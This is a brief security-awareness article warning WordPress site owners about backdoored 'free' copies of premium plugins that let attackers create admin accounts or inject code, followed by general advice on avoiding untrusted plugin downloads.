A new phishing scam is targeting WordPress websites through posing as legitimate versions of popular WordPress plugins.
The scam involves posting altered versions of WordPress plugins to file-sharing or WordPress-focused sites, in the hopes that someone will download and install them. Typically, premium plugins that normally command a price are the ones chosen. These “fake” premium plugins are then posted for free. Sometimes claiming to be special beta or trial versions in order to legitimize the free price tag.
The attacker may even start with a legitimate version of the plugin in question; however, changes are made that open several potential security issues for sites that install these modified plugins.
Once the altered plugin is installed into a WordPress site, the attacker uses “specific parameters” that allow them to create a new admin account. Once the attacker has created a new admin account for themselves, they can then alter the site at will.
Other “altered” plugins may simply inject malicious code directly into the site once installed. According to researchers
analyzing this new attack strategy, the culprit can then side-load any other modified themes or plugins they want. They can upload malicious files to the server, and a cascading effect can lead to all sites on that account being compromised.
The easiest solution is a path of avoidance.
Do not download plugins offered by email, and avoid downloading plugins from sites you don’t trust. If you do come across a premium plugin or theme that is normally expensive, but seems to be offered for free on a file-sharing site, question it. Do not immediately download it.
Go to the developer’s site and check the plugin directly. If they don’t mention a special discounted price, you’re probably better off avoiding the risk.
As always, practice caution. If something on the internet seems too good to be true, it most likely is.